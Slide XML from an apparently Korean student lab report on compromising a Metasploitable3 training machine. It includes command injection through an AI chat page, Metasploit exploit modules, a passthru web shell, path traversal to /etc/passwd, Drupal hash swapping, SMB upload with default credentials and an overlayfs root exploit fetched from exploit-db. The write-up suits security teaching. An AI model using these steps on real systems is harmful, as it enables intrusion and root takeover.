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840" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId30"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="383" r:id="rId2"/>
    <p:sldId id="283" r:id="rId3"/>
    <p:sldId id="372" r:id="rId4"/>
    <p:sldId id="373" r:id="rId5"/>
    <p:sldId id="374" r:id="rId6"/>
    <p:sldId id="378" r:id="rId7"/>
    <p:sldId id="379" r:id="rId8"/>
    <p:sldId id="380" r:id="rId9"/>
    <p:sldId id="381" r:id="rId10"/>
    <p:sldId id="382" r:id="rId11"/>
    <p:sldId id="375" r:id="rId12"/>
    <p:sldId id="384" r:id="rId13"/>
    <p:sldId id="385" r:id="rId14"/>
    <p:sldId id="388" r:id="rId15"/>
    <p:sldId id="391" r:id="rId16"/>
    <p:sldId id="400" r:id="rId17"/>
    <p:sldId id="401" r:id="rId18"/>
    <p:sldId id="402" r:id="rId19"/>
    <p:sldId id="403" r:id="rId20"/>
    <p:sldId id="404" r:id="rId21"/>
    <p:sldId id="406" r:id="rId22"/>
    <p:sldId id="407" r:id="rId23"/>
    <p:sldId id="408" r:id="rId24"/>
    <p:sldId id="409" r:id="rId25"/>
    <p:sldId id="376" r:id="rId26"/>
    <p:sldId id="395" r:id="rId27"/>
    <p:sldId id="396" r:id="rId28"/>
    <p:sldId id="397" r:id="rId29"/>
  </p:sldIdLst>
  <p:sldSz cx="13004800" cy="975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37" autoAdjust="0"/>
    <p:restoredTop sz="94665"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="58" d="100"/>
          <a:sy n="58" d="100"/>
        </p:scale>
        <p:origin x="138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567630" y="3394480"/>
            <a:ext cx="9869540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4978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74875" y="6190285"/>
            <a:ext cx="7255053" cy="176340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70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 algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2702"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1300460" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2560"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1950690" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2276"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2600919" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2276"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3251149" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2276"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3901379" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2276"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4551609" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2276"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="5201839" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2276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52909B-09F8-4BD5-AF55-A665955BBD60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30708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9B1F-4A78-4DE2-B1E7-52FA32BE5580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113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9986" y="1332992"/>
            <a:ext cx="1498974" cy="7087616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84155" y="1332992"/>
            <a:ext cx="6707447" cy="7087616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9B1F-4A78-4DE2-B1E7-52FA32BE5580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82777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0608121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9B1F-4A78-4DE2-B1E7-52FA32BE5580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566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573581" y="3394480"/>
            <a:ext cx="9870643" cy="2340864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4978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74875" y="6190172"/>
            <a:ext cx="7255053" cy="1799228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702">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="650230" indent="0">
              <a:buNone/>
              <a:defRPr sz="2702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5D96E-8D7E-422E-A2A8-D28C1B4E7B86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2549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67630" y="3751885"/>
            <a:ext cx="4676299" cy="44117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0870" y="3751885"/>
            <a:ext cx="4679845" cy="441170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9B1F-4A78-4DE2-B1E7-52FA32BE5580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679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7629" y="3290218"/>
            <a:ext cx="4676301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7629" y="4470400"/>
            <a:ext cx="4676301" cy="369319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760870" y="4470400"/>
            <a:ext cx="4679845" cy="3693193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760870" y="3290218"/>
            <a:ext cx="4679845" cy="1001368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2702" b="0" cap="all" spc="142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650230" indent="0">
              <a:buNone/>
              <a:defRPr sz="2702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9B1F-4A78-4DE2-B1E7-52FA32BE5580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093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55670-3E6A-43D3-8215-C1C48E0C9650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6970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34154-F461-49B9-A649-5772D9210BB9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4764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502400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911222" y="3191224"/>
            <a:ext cx="4679956" cy="1623462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987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5152" y="1144423"/>
            <a:ext cx="5136896" cy="7464755"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2702">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2276">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2276">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="2276">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="2276">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr>
              <a:defRPr sz="2276"/>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:defRPr sz="2276"/>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:defRPr sz="2276"/>
            </a:lvl8pPr>
            <a:lvl9pPr>
              <a:defRPr sz="2276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7328" y="5048772"/>
            <a:ext cx="4047744" cy="312040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rgbClr val="FFFFFF"/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E9B1F-4A78-4DE2-B1E7-52FA32BE5580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911222" y="8869274"/>
            <a:ext cx="5413544" cy="455168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91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6502399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910336" y="3191222"/>
            <a:ext cx="4681728" cy="1625600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987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02401" y="-59978"/>
            <a:ext cx="6508904" cy="97536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4551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650230" indent="0">
              <a:buNone/>
              <a:defRPr sz="3982"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1300460" indent="0">
              <a:buNone/>
              <a:defRPr sz="3413"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1950690" indent="0">
              <a:buNone/>
              <a:defRPr sz="2844"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2600919" indent="0">
              <a:buNone/>
              <a:defRPr sz="2844"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3251149" indent="0">
              <a:buNone/>
              <a:defRPr sz="2844"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3901379" indent="0">
              <a:buNone/>
              <a:defRPr sz="2844"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4551609" indent="0">
              <a:buNone/>
              <a:defRPr sz="2844"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="5201839" indent="0">
              <a:buNone/>
              <a:defRPr sz="2844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27328" y="5048774"/>
            <a:ext cx="4047744" cy="3120408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2133">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="650230" indent="0">
              <a:buNone/>
              <a:defRPr sz="1991"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1300460" indent="0">
              <a:buNone/>
              <a:defRPr sz="1707"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1950690" indent="0">
              <a:buNone/>
              <a:defRPr sz="1422"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2600919" indent="0">
              <a:buNone/>
              <a:defRPr sz="1422"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3251149" indent="0">
              <a:buNone/>
              <a:defRPr sz="1422"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3901379" indent="0">
              <a:buNone/>
              <a:defRPr sz="1422"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4551609" indent="0">
              <a:buNone/>
              <a:defRPr sz="1422"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="5201839" indent="0">
              <a:buNone/>
              <a:defRPr sz="1422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E842EE3-1862-478D-ABFA-CE4447D28533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910336" y="8869274"/>
            <a:ext cx="5409997" cy="455168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr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4344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84154" y="1372006"/>
            <a:ext cx="8444807" cy="1690624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4154" y="3751887"/>
            <a:ext cx="8444807" cy="44117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03385" y="8872983"/>
            <a:ext cx="2937330" cy="4607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22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485E9B1F-4A78-4DE2-B1E7-52FA32BE5580}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/17/2022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67629" y="8869274"/>
            <a:ext cx="6480589" cy="455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22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19270" y="8843264"/>
            <a:ext cx="520192" cy="520192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564" spc="0" baseline="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rPr lang="en-US" altLang="ko-KR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22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txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" defTabSz="1300460" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3698" kern="1200" cap="all" spc="284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32511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56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5023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97534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300460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625575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869411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6pPr>
      <a:lvl7pPr marL="2113247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>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="2357083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00919" indent="-325115" algn="l" defTabSz="1300460" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1422"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2276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130046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목차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DB97258-7350-4E3D-B706-DDBB7FC8610C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32519" y="2896075"/>
            <a:ext cx="12939761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공격기법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#1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drupal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page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 알아내기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공격기법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drupal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 shell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얻기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1	(semi-critical)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공격기법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drupal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 shell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얻기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2	(semi-critical)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공격기법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#4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payroll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sql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injection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공격기법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#5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phpMyAdmin brute force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공격기법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#6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attack				(critical)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공격기법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#7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continuum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취약점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				(critical)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공격기법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#8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phpmyadmin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취약점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				(semi-critical)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공격기법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#9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Wdruf.php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 취약점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공격기법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#10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Ruby on rails readme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취약점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공격기법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#11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drupal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계정 얻기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공격기법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#12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파일 공유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						(semi-critical)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공격기법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#13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overlayfs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권한 상승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				(critical)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 shell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딴 경우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공격기법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#13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overlayfs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권한 상승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방법으로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root shell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딸 수도 있기 때문에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semi-critical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이라 하였다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 공유의 경우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공격기법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#13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overlayfs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권한 상승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)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소개한 파일 등 악성 코드를 이용하여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root shell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딸 수도 있기 때문에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semi-critical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이라 하였다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69243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#6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chat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 이용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>attack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D992D3-09F6-4A0F-97DD-B7FBE14B2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1" y="2769924"/>
            <a:ext cx="5400000" cy="292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508D82-17D0-4D8E-870F-7A1CC330CA67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95036" y="7327448"/>
            <a:ext cx="128147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chat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들어가면 인공지능과 이야기를 할 수 있는데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여기에 다음과 같이 입력하면 원하는 명령어를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root shell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실행할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do you know vagrant+%26%26+[command]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이를 이용하면 다음과 같이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root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password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없애고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victim machine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root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로그인 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do you know vagrant+%26%26+passwd –d root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32E0F85-F360-43B2-9B69-DD9C47EC8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300" y="2037885"/>
            <a:ext cx="5400000" cy="438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9730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#7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continuum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점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6890E19-794C-41FD-BFFC-2B78B19A7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1691624"/>
            <a:ext cx="5400000" cy="294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78FBC0-7E51-42CC-B839-B9F25A0B377A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668110" y="8181352"/>
            <a:ext cx="116685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$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nmap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[target IP]</a:t>
            </a:r>
          </a:p>
          <a:p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를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해보면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8080 port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열려 있는 것을 확인할 수 있고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[target IP]:8080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접속이 되는 것을 확인할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 후 페이지에 나와 있는 링크에 접속해보면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번째 그림과 같이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continuum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페이지로 넘어가는 것을 확인할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2CE18C1-70C0-4348-AD13-AB55E2045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302" y="1702874"/>
            <a:ext cx="5400000" cy="2925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8644F31-1ED9-4C51-9733-45954A2CEC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2399" y="5045431"/>
            <a:ext cx="5400000" cy="29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65721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#7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continuum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점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13AEC5D-D4E4-4AE1-A440-E3259CD4B1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498" y="1400302"/>
            <a:ext cx="5400000" cy="2947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396065-780F-4080-98F4-277BB6A4C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4512562"/>
            <a:ext cx="5400000" cy="29475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97C60A5-0EC8-4E26-9253-485FD8A9FA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2300" y="2223602"/>
            <a:ext cx="5400000" cy="43890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4C00FE7-94A6-4920-89B1-2F4BF0495BD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49351" y="7659990"/>
            <a:ext cx="129060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이에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msfconsole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continuum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search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해보면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exploit/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linux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apache_continuum_cmd_exec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있는 것을 확인할 수 있으며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set RHOSTS [target IP]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exploit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meterpreter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들어가지는 것을 확인할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여기서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shell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입력하면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root shell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딸 수 있게 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43431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#8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phpmyadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점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030C1D5-7279-4AF9-97D7-0D28D10E8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835" y="1567622"/>
            <a:ext cx="9893130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F514EA-C9C4-47B6-8533-B645F8D21C2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524641" y="7473461"/>
            <a:ext cx="119555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phpMyAdmin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대한 취약점을 공략하기 위해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msfconsole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phpmyadmin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검색해보면 위와 같은 방법들이 나온다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553010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#8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phpmyadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점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6A6DBD6-F6C4-497F-B26A-E3C07CCBB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834" y="1659780"/>
            <a:ext cx="9893131" cy="54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A0C6C4-2532-46AC-A8CD-8704AE3AD765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575936" y="7632155"/>
            <a:ext cx="118529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앞서 찾아본 방법 중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exploit/multi/http/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phpmyadmin_preg_replace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방법을 이용하면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www-data shell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딸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단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RHOSTS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target IP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설정하는 것이 아니라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PASSWORD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도 설정해줘야 하는데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이는 앞서 공격기법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#5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–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phpMyAdmin brute force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알아낸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password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설정해주면 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9555189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#9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Wdruf.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>페이지 취약점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C1F1FBE-38F4-4E62-A7CB-49A1343EAC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85" y="1618822"/>
            <a:ext cx="9969230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BB815A0-21D1-46FF-B1D1-E62E8BF2FAA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2601332" y="7449234"/>
            <a:ext cx="78021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[target IP]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접속 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가장 먼저 보이는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WDruF.php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페이지에 들어가보면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WDruF.php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파일의 위치가 나와 있고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passthru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함수를 조심하라고 적혀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218279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#9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Wdruf.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>페이지 취약점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BE91448-DBCA-4347-B9B8-DAAE552DA346}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1717275" y="7502736"/>
            <a:ext cx="95702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 shell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로그인 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/var/www/html/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WDruF.php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읽어보면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sw%OP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변수 값을 인자로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passthru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함수를 실행시키는 것을 볼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passthru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함수를 살펴보면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PHP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외부 프로그램을 실행시키는 함수라는 것을 알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16A67D2-839C-49FE-9DA5-655A984D6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835" y="1659780"/>
            <a:ext cx="989313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2660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#9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Wdruf.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>페이지 취약점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99C085C-C6FF-4AAC-ADFD-92C4F46DF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85" y="1567622"/>
            <a:ext cx="9969230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E7B91F-9F37-4107-BF7D-18AF492A3375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088117" y="7329785"/>
            <a:ext cx="482856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앞서 알아낸 정보들을 바탕으로 우리는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[target IP]/WDruF.php?sw5OP=[command]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접속하여 원하는 정보를 읽어올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509182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#9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Wdruf.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>페이지 취약점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AA0766-87E7-48B5-98A6-D6A9BE844D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835" y="1819943"/>
            <a:ext cx="989313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84717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#10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Ruby on rails readme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>취약점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8119B9C-9D63-487C-8CDC-A9B522ADC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300" y="4434953"/>
            <a:ext cx="5400000" cy="2925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EA9AE22-C7BC-4F42-9A58-ADF754D6FD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4434953"/>
            <a:ext cx="5400000" cy="2925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DB11A1-40B6-4EE3-9037-A3BF4F118669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333884" y="7735013"/>
            <a:ext cx="123370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[target IP]:3500/readme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페이지를 분석해보면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os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변수에 어떤 값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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오냐에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따라 다른 페이지를 보여주는 것을 볼 수 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이를 통해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readme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페이지는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os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변수에 따라 출력하는 페이지가 달라질 수 있다는 것을 알 수 있으며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Root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디렉토리가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/opt/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readme_app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인 것을 감안하면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([target IP]:3500/[path]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path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잘못 입력할 경우 안내 페이지에서 알 수 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.)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[target IP]:/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readme?os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=../../../../../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etc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/passwd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같은 방법으로 원하는 파일을 읽어볼 수 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531EFDE-9234-4CE7-B4A5-22FFBA7076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1354666"/>
            <a:ext cx="5400000" cy="2925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79FEAA9-EE2C-461D-B00B-5DA36F3B8D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2300" y="1354666"/>
            <a:ext cx="5400000" cy="29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3191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#1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drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>정보 알아내기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D9BBB5-FAE2-4BF3-8465-5206CBA4C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3042709"/>
            <a:ext cx="5400000" cy="28968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FE5AE8-6E7D-4EAE-A56F-E0BAC86456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302" y="3042708"/>
            <a:ext cx="5400000" cy="2896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B75E32-AC67-43F0-80A1-B230AC6EBDD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219543" y="6937856"/>
            <a:ext cx="10565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target IP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접속을 해보면 좌측과 같은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page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나오며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drupal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폴더에 들어가면 우측과 같은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page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뜬다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BCB82CE-8BB9-4AA7-835B-58F704CFB52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="3997960"/>
            <a:ext cx="388620" cy="127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6404956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#11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drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 계정 얻기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20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E0BA936-3E5F-4ED6-B714-27991DD2A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785" y="1695022"/>
            <a:ext cx="9969230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281406B-DE92-40A0-A79E-953E9E9F0850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598379" y="7319914"/>
            <a:ext cx="1180804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앞서 얻은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root/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sploitme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게정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 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phpMyAdmin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접속하면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database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확인하고 관리할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 중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drupal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users database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살펴보면 사진과 같이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metasploitable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라는 이름의 계정이 있는 것을 확인할 수 있고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비밀번호가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hash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값으로 되어 있는 것을 볼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hash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값을 보고 비밀번호를 알아내지는 못하지만 우리가 원하는 비밀번호의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hash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database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바꾼다면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우리가 원하는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password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로그인 할 수 있게 될 것이다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672345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#11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drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 계정 얻기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21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82B67C-6EBA-4C71-BCF5-9F3D3C9331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801322"/>
            <a:ext cx="5400000" cy="29475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940592-E86C-4F68-A555-2062DF6CF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302" y="2801323"/>
            <a:ext cx="5400000" cy="2947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F8712F-5380-4636-BB3A-035633E71E48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3820415" y="6630041"/>
            <a:ext cx="53639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drupal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관련한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hash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함수를 찾아보았다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/var/www/html/drupal/scripts/password-hash.sh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hash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관련한 파일을 찾을 수 있었다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0646519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#11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drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 계정 얻기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22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64319A9-C680-4992-9162-586AE043D8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801323"/>
            <a:ext cx="5400000" cy="2947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9A19CC3-F1A7-437C-84C6-883D49BA5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300" y="2801323"/>
            <a:ext cx="5400000" cy="294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717A13-8A63-4F2A-A550-2CD6D040321A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681482" y="6437440"/>
            <a:ext cx="764183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password-hash.sh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파일을 읽어보면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시작하는 것을 확인할 수 있었다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$ php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[path]/password-hash.sh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와 같이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이를 실행시켜보자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구문 오류가 뜨며 사용법을 알 수 있었다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사용법에 따라 다음과 같이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hash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값을 알고자 하는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plain-text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집어넣자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database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본 것과 유사한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hash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값이 나오는 것을 확인할 수 있었다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$ php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[path]/password-hash.sh “[plan text]”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4086930806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#11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drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 계정 얻기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23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780C5EE-36A5-4CFE-803B-CAC7CC228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801323"/>
            <a:ext cx="5400000" cy="2947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1DF9ED2-03AF-45EC-B363-56873B955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300" y="2801323"/>
            <a:ext cx="5400000" cy="2947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D3C73F-B3E4-4EA2-A2A8-2262C4E651FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2162910" y="6787662"/>
            <a:ext cx="8678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앞에서 얻은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hash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값으로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database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password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부분을 수정하면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우측 사진과 같이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drupal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metasploitable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계정으로 로그인 되는 것을 확인할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5339379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#12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파일 공유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24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EB4DEE3-2CB4-4C6B-8B23-703C4AF30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835" y="1358855"/>
            <a:ext cx="9893130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0D3F4D-42C0-4095-A139-A95C3258AC76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="208850" y="6846300"/>
            <a:ext cx="1258710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msfconsole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auxiliary/admin/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smb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upload_file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이용하면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attack machine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victim machine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사이에 데이터를 주고 받을 수 있다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방법은 아래와 같다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set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RHOSTS [victim IP]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set SMBPASS rwaaaaawr5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set SMBUSER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chewbacca</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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set RPATH [sending file path]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set LPATH [receiving file path]</a:t>
            </a:r>
          </a:p>
          <a:p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&gt;exploit</a:t>
            </a:r>
          </a:p>
          <a:p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이는 알려진 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600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chewbacca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/rwaaaaawr5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계정에 대한 공격이며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옮긴 파일을 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 shell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실행하고자 할 때에는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파일을 복사하여 이용해야 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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sz="16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5330920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B094D0-B0C5-4FD7-8078-98336934D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178" y="3801848"/>
            <a:ext cx="9893131" cy="5400000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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#13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overlayfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>권한 상승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25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C4EBF5-4F58-4653-B8D8-2999EDBF5BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="1662227"/>
            <a:ext cx="11102719" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2">
              <a:alpha val="74902"/>
            </a:srgbClr>
          </a:solidFill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앞서 설명한 방법 중 하나로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 shell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얻었다면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https://www.exploit-db.com/exploits/37292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코드를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tmp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다운 받아 실행 시켜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권한 상승을 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$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gcc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exploit.c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–o exploit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$ ./exploit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그러나 안타깝게도 과제로 받은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metasploitable3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에는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gcc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깔려 있지 않아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attack machine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컴파일 한 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앞서 설명한 방법으로 실행파일을 공유하여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victim machine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실행시켜야 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그러나 다운 받은 코드를 잘 살펴보면 실행파일 내부에서도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gcc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실행시키는 코드가 포함된 것을 확인할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따라서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해당 코드를 따로 분리하여 컴파일 한 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파일을 넘겨줘야 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ABB56B3-D186-4BB3-8E6D-7C50FC142C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="7736115"/>
            <a:ext cx="2859314" cy="2077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8836477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#13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overlayfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>권한 상승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26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8C72FF-C991-4475-B87B-2C10670B5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3012152"/>
            <a:ext cx="5400000" cy="294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748F77-43AB-4228-99A9-9790C3CA1C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
